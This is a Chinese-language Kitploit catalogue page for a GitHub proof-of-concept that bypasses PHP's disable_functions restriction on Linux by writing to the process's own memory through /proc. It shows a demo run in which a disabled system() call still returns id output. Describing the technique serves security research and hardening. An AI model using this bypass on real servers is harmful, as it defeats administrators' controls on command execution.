Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
php-bypass-disable-functions — 演示项目:如何在 Linux 上绕过 PHP 的 disable_functions 安全控制 | Kitploit
工具/GitHubGitHub/irsl/php-bypass-disable-functions
权限提升漏洞利用Web应用程序漏洞利用后渗透利用红队二进制利用
GitHubirsl/php-bypass-disable-functions

php-bypass-disable-functions

演示项目:如何在 Linux 上绕过 PHP 的 disable_functions 安全控制

查看仓库
276457年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

php-bypass-disable-functions

演示项目,展示如何在 Linux 上绕过 PHP 的 disable_functions 安全控制,其中进程可以通过标准文件操作(open/seek/read/write)经特殊的 /proc/self/map 文件检查和写入自身内存。

已在 PHP 7.3.5、x86_64 Linux 上测试

另见:https://seclists.org/bugtraq/2019/May/52

如何使用

root@kitploit:~
regularuser@7981d86dd9aa:/$ ./php-7.3.5-vanilla/sapi/cli/php -d 'disable_functions=system' disfunpoc.php

Warning: system() has been disabled for security reasons in /repo-shared/disabled_functions/disfunpoc.php on line 2
uid=1000(regularuser) gid=1000(regularuser) groups=1000(regularuser)

下载工具